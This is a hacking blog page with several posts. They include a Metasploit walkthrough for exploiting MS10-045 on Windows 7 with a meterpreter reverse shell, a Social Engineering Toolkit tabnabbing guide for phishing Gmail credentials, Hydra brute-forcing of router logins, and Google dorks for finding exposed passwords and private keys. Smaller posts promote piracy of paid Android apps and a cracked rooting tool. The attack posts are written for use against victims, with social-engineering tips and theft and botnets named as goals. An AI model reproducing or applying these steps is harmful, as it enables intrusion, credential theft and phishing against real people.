Boost Up Your Earnings In Adf.ly


Question How ?
Adf. ly Team Has Created a New PTC Site Which is Attached With Your Adf.ly Account.
Actually The Website is a Beta i mean very simple design, they are still developing it.



"This private Beta of CashPiggy. Our aim is to revolutionise the 'Get Paid To' industry, allowing everyone to earn some cash in their spare time.
This is the first beta version of the website open only to a selection of our AdFly users.
CashPiggy is owned and operated by the same team behind AdFly - so you know it is a name you can trust

Remember linking your Cashpiggy account with your AdFly account in your withdraw settings page""
what are you waiting for 

Read More

Crack Windows 7 Computer In Kali Linux/ Backtrack

:: CRACK WINDOWS 7 COMPUTER IN KALI LINUX ::


In this tutorial, I will show you how to use a simple shortcut file to crack a windows 7 computer.

:: Intro ::

:Windows 7 is now the most popular OS for desktop and laptop computers, especially now that XP is no longer going to be supported by Microsoft. 

:Cracking into a computer can be useful for a number of reasons: it can give you access to the rest of the network, you can use it as a proxy to hide your IP, you can steal valuable files/details, you can use it as part of a botnet to DOS, etc, and more.


:The operating system itself has become quite secure, but numerous vulnerabilities can still be found in other programs installed like the browser, adobe reader, and office. The vulnerability we will exploit is one found in the way windows 7 handles shortcut files.

:Lets begin...!



1 :: Open Metasploit
You should be able to do this by yourself by now.

2 :: Select the Exploit
Microsoft has identified this vulnerability as MS10-045, it takes advantage of a buffer overflow in the shortcut dll. Use this command in Metasploit to load the exploit:

msf > use windows/ms10_045_shortcut_icon_dllloader
3 :: Configure the Exploit OptionsThe first option to set is the payload, and as before, we will use the meterpreter. this is an amazingly powerful payload which we can use to completely own their box.
:Code:set PAYLOAD windows/meterpreter/reverse_tcp
Then we need to set the LHOST, which is the IP of our (the attackers) computer:

:Code:set LHOST 192.168.1.111
4 :: Run The ExploitAs usual, just use the command:
Code:exploit
And this will generate a link and a server to host that link.
Now we need the victim to click the malicious link!!


5 :: Send The Link To The VictimThis will require a bit of social engineering to convince the user to click the link. Be creative, tell them it is the latest movie download site or the password to a locked RAR file. When the victim clicks the link, their security settings will probably prompt them to allow or deny the webpage access to windows explorer, and they must click allow.
When the victim clicks on the "Allow" prompt, Metasploit begins the process of establishing a client/server connection between you and the victim. This process is fairly slow, so be patient. It may not even work, but be patient and hope it does :)

We will now have control of their computer through the meterpreter installed on their machine. Now you can go ahead and do almost anything you like! In previous tutorials i covered how to download files and view the webcam/microphone, but the fun doesn't have to stop there!
Download Backtrack 5R3 32 BitDownload Backtrack 5R3 64 Bit
Click to Like Our Facebook Page
Read More

UnlockRoot Pro Full Version

UNLOCKROOT PRO FULL VERSION
( ROOT YOUR ANDROID DEVICE )

What Is Rooting ?
"Rooting" your device means obtaining "superuser" rights and permissions to your Android's applications. Having All he Rights To Your Smartphone is a Really Big Advantage It will make you feel like you are the owner of this phone and the smartphone is your slave!! xD!

What Is UnlockRoot ?
:: Unlock Root is a software to help you root your Android device.
The main function of this software is to obtain the highest user privileges, thus you can remove, install or uninstall any applications on your device freely and give you a clean system since you use Unlock Root.

:: Nothing to worry whether your device would get bricked, because this software is stable enough.

:: Unlock Root has over 10,000,000 users around the world. It has 2 years of development. On December, 2012, Unlock Root Pro launched.

:: It supports Android 2.2-2.3, 4.0.3 and even the hottest and latest devices, such as Samsung Galaxy S/SII/SIII, Note/Note 2, HTC One X, Amazon Kindle Fire/HD 7",Google Nexus 4/7/10, etc.

:: It is the safest root software and provided with restore function. You can successfully root your device in 5 minutes!

:: What Else Do You Need Click Below To download 

Click to Like Our Facebook Page
Read More

Tracing - Mobile Number, IP Address

Tracing Mobile Number, IP Address
An approach to introduce people with the truth of HACKING",
Today in this post I'll tell you how can you trace Mobile numbers, Bulk SMS sender, Pin code, Vehicle number Land line number etc.

Many of people always waste lots of time to find all these information on the Internet but its worthless and time consuming, Your Solution is INDIA TRACE, it is a  fantastic & All in one website to trace all your needs within few seconds.

http://www.indiatrace.com/


Please Share This Blog If You'd Enjoyed all the Tutorials we've written OR

Click to Like Our Facebook Page

Read More

Using Xhydra to Hack Router Password in Backtrack or Kali Linux

Using Xhydra To Hack Router Password!!
Here we are. Firstly i must advise you to only use these methods to test your own security. I will be hacking my own email address / router password as example. 
All Tools to be found in Backtrack 5 OR Kali Linux!

INTRO:
Xhydra : It can be used to brute force a huge number of passwords, including Telnet and FTP.

If you are Using Another Linux Such as Ubuntu, if i am not mistaken ubuntu doesnt surely include Xhydra so Inorder to install it follow the steps written below!!

install Xhydra by opening a terminal window (Applications>Accessories-->Terminal) and typing the following command:
sudo apt-get install hydra ,  Then You're good to go!!


Starting
Start X-Hydra
Also Start Zenmap
Everything Should Start, And Look Like This...
We will start by hacking a local network router password. This can be very useful to a hacker in the scenario where one has cracked a wifi password and gained local access to the network. After gaining access to the router possibilities are endless.

All router security can be disabled and then we can perform MitM attacks. if you're experienced enough in networking then you get the picture.

Typically a router's IP address will start with 192.168.x.x. (which it may be in your case) to check this type ifconfig in linux.
(the routers IP will be the Default Gateway). 
Now i'm sure you have seen this before:

















What we are going to do is tell Xhydra to connect to the routers http server with a protected page, input the username and bruteforce the password. Note this method can be used against any similar password protected page not using forms.

so your input should be like this:






















Check off show attempts as it makes it easier. single target SHOULD BE YOUR DEFAULT GATEWAY. perhaps 192.168.0.1. do not use this against websites or hardware you do not own or have permission to test. Important - port should be 80 or in some cases 8080. EVEN MORE IMPORTANT under PROTOCOL find http-get and click it. to find open ports on a device just scan the target IP with zenmap.

























Back To Hydra...






















In most cases the username will be admin. also in most cases the password will be either "password" "admin" or BLANK.
however, in my situation the default password is far different from admin or blank. so what i have done was selected a wordlist. you can find many wordlists using google. typically the bigger the better especially on a local network. backtrack comes with a few. can be found in: /root/pentest/passwords/wordlists
i have compiled my own and named it password.lst. It has 1.1 million Words in it!!
Click Here To Download

so:
click username enter admin
click Password list and select your list
also check off "try login as password" and "try empty password"

then move to the Specific tab.























change http / https url to just a slash    /
this tells hydra what directory the protected page is on the server.

goto the start tab and click start. results will follow.























Now You're good to go!!
Please Share This Blog If You'd Enjoyed all the Tutorials we've written OR


Click to Like Our Facebook Page
Read More

Download Any Paid App on Android For FREE!!

DOWNLOAD PAID APPS FOR FREE IN ANDROID!!
Hey Guys, After a Long Time I am Introducing You All With a New Remarkabke, astonishing App
CALLED


What is it?
Approid Is an Open Source .apk File Extension Which Allows Any Android user To Download Paid Apps from the appstore for free, it isn't Like Blackmart But It is more better than Blackmart and when i mean any Paid android app i do mean it!! ;) 

Advantage:
You Can Download Any Paid Apps,Games Such as Fifa 14,Minecraft,Swype Keyboard etc

Disadvantage:
You Got a Slow Phone? !!, Then It might Crash If too much usage is going on in your phone!!

Checkout the screenshot below Shows the paid apps


Requirements
Android Running System
Only Version 4.X is Compatible With This Version
Otherwise You are Good To GO!!!


Click to Like Our Facebook Page
Read More

How to Hack Gmail & Facebook In Backtrack/Kali Linux

HOW TO HACK GMAIL & FACEBOOK IN BACKTRACK / KALI
#Red Colour = Codes to Ponder

INSTRUCTIONS

First open your backtrack terminal and type ifconfig to check your IP

Now Again Open Your Backtrack terminal and Type cd  /pentest/exploits/set

Now Open Social Engineering Toolkit (SET) type ./set

Now choose option 2, “Website Attack Vectors”.

In this option we will select option 4 “Tabnabbing Attack Method”.

In this option we will choose option 2 “Site Cloner”.

Enter the URL of the site you want to clone. In this case http://www.gmail.com/ and hit enter. SET will clone up the web site. And press return to continue.

Now convert your URL into Google URL using goo.gl and send this link address to your victim via Email or Chat.

When victim will open the shortened link in their browser it should show a message that the page is still loading. so the victim will start to open another tab. As soon as victim will open a new tab, our fake website will start working. That script will redirect the victim to the phishing page that you created.

Click to Like Our Facebook Page
Read More

Use Google To Find Username & Passwords

Using Google To Find Username And Passwords
Requirements
1. A modern webbrowser and a internet.
2. Time


Method 1: Facebook
We will be using a google dork to find usernames and passwords of many accounts including Facebook!

The Dork: intext:charset_ test= email= default_persist ent=


Enter that into Google, and you will be presented with several sites that have username and passwords lists!



Method 2: WordPress!
This will look for WordPress backup files Which do contain the passwords, and all data for the site!


The Dork: filetype:sql inurl:wp-conten t/backup-*



Method 3: WWWBoard!
This will look for the user and passwords of WWWBoard users

The Dork: inurl:/ wwwboard/ passwd.txt



Method 4: FrontPage!
This will find all users and passwords, similar to above.

The Dork: ext:pwd inurl:(service | authors | administrators | users)"# -FrontPage-"



Method 5: Symfony

This finds database information and logins

The Dork: inurl:config/ databases.yml -trac -trunk -"Google Code"-source -repository



Method 6: TeamSpeak
This will search for the server.dbs file 
(A Sqlite database file With the SuperAdmin username and password)


The Dork: server-dbs"intitle:index of"



Method 7: TeamSpeak 2
This will find the log file which has the Super Admin user and pass in the Top 100 lines. Look for"superadmin account info:"

The Dork: "inurl:Teamspea k2_RC2/ server.log"



Method 8: Get Admin pass
Simple dork which looks for all types of admin info

The Dork: "admin account info"filetype:log



Method 9: Private keys
This will find any .pem files which contain private keys.

The Dork: filetype:pem pem intext:private


And the Ultimate one, the regular directory full of passwords.



Method 10: The Dir of Passwords!
Simple one!

The Dork: intitle:"Index of..etc"passwd
Read More